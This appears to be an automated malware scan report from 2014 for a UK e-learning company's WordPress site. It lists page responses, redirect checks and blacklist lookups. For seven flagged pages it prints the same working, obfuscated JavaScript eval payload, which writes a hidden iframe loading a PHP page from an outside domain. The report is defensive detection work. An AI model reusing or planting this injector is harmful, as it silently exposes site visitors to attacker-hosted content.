Scanned pages/files
Request | Server response | Status |
http://growthengineering.co.uk/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 08 Sep 2014 20:39:23 GMT Location: http://www.growthengineering.co.uk/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.growthengineering.co.uk/xmlrpc.php X-Powered-By: PHP/5.2.17 X-UA-Compatible: IE=EmulateIE7 | clean |
http://www.growthengineering.co.uk/ | 200 OK Content-Length: 37202 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a.7(\'<1 2="3://4.5/6/b.8" 9="0" c="0" d="0" e="f: g;"></1>\');',17,17,'|iframe|src|http|folur|in|cumba|write|php|border|document||width|height|style|visibility|hidden'.split('|'),0,{})) Antivirus reports:
| ||
http://www.growthengineering.co.uk/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/x-javascript | clean |
http://www.growthengineering.co.uk/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://www.growthengineering.co.uk/wp-content/plugins/images-thumbnail-sliderv1/js/jc.js?ver=3.8.4 | 200 OK Content-Length: 14629 Content-Type: application/x-javascript | clean |
http://www.growthengineering.co.uk/wp-content/themes/thesis_185/custom/scripts/jquery.bxSlider.js | 200 OK Content-Length: 43764 Content-Type: application/x-javascript | clean |
http://www.growthengineering.co.uk/wp-content/themes/thesis_185/custom/scripts/home.js | 200 OK Content-Length: 819 Content-Type: application/x-javascript | clean |
http://growthengineering.co.uk/elearning | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 08 Sep 2014 20:39:27 GMT Pragma: no-cache Location: http://www.growthengineering.co.uk/tag/elearning/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.growthengineering.co.uk/xmlrpc.php X-Powered-By: PHP/5.2.17 X-UA-Compatible: IE=EmulateIE7 | clean |
http://www.growthengineering.co.uk/tag/elearning/ | 200 OK Content-Length: 42915 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a.7(\'<1 2="3://4.5/6/b.8" 9="0" c="0" d="0" e="f: g;"></1>\');',17,17,'|iframe|src|http|folur|in|cumba|write|php|border|document||width|height|style|visibility|hidden'.split('|'),0,{})) Antivirus reports:
| ||
http://www.growthengineering.co.uk//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js/ | 404 Not Found Content-Length: 24152 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a.7(\'<1 2="3://4.5/6/b.8" 9="0" c="0" d="0" e="f: g;"></1>\');',17,17,'|iframe|src|http|folur|in|cumba|write|php|border|document||width|height|style|visibility|hidden'.split('|'),0,{})) Antivirus reports:
| ||
http://www.growthengineering.co.uk/about-us/ | 200 OK Content-Length: 39095 Content-Type: text/html | clean |
http://www.growthengineering.co.uk/category/sales-academy-solutions/ | 200 OK Content-Length: 44318 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a.7(\'<1 2="3://4.5/6/b.8" 9="0" c="0" d="0" e="f: g;"></1>\');',17,17,'|iframe|src|http|folur|in|cumba|write|php|border|document||width|height|style|visibility|hidden'.split('|'),0,{})) Antivirus reports:
| ||
http://www.growthengineering.co.uk/category/learning-management-system/ | 200 OK Content-Length: 43546 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a.7(\'<1 2="3://4.5/6/b.8" 9="0" c="0" d="0" e="f: g;"></1>\');',17,17,'|iframe|src|http|folur|in|cumba|write|php|border|document||width|height|style|visibility|hidden'.split('|'),0,{})) Antivirus reports:
| ||
http://www.growthengineering.co.uk/category/learning-management-system/gamification/ | 200 OK Content-Length: 42563 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a.7(\'<1 2="3://4.5/6/b.8" 9="0" c="0" d="0" e="f: g;"></1>\');',17,17,'|iframe|src|http|folur|in|cumba|write|php|border|document||width|height|style|visibility|hidden'.split('|'),0,{})) Antivirus reports:
| ||
http://www.growthengineering.co.uk/clients/ | 200 OK Content-Length: 21526 Content-Type: text/html | clean |
http://www.growthengineering.co.uk/category/news/ | 200 OK Content-Length: 42895 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a.7(\'<1 2="3://4.5/6/b.8" 9="0" c="0" d="0" e="f: g;"></1>\');',17,17,'|iframe|src|http|folur|in|cumba|write|php|border|document||width|height|style|visibility|hidden'.split('|'),0,{})) Antivirus reports:
| ||
http://www.growthengineering.co.uk/demo/ | 200 OK Content-Length: 22768 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: growthengineering.co.uk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 08 Sep 2014 20:39:23 GMT
Location: http://www.growthengineering.co.uk/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.growthengineering.co.uk/xmlrpc.php
X-Powered-By: PHP/5.2.17
X-UA-Compatible: IE=EmulateIE7
...0 bytes of data.
GET / HTTP/1.1
Host: growthengineering.co.uk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 08 Sep 2014 20:39:23 GMT
Location: http://www.growthengineering.co.uk/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.growthengineering.co.uk/xmlrpc.php
X-Powered-By: PHP/5.2.17
X-UA-Compatible: IE=EmulateIE7
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: growthengineering.co.uk
Referer: http://www.google.com/search?q=growthengineering.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: growthengineering.co.uk
Referer: http://www.google.com/search?q=growthengineering.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=growthengineering.co.uk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://growthengineering.co.uk/
Result: growthengineering.co.uk is not infected or malware details are not published yet.
Result: growthengineering.co.uk is not infected or malware details are not published yet.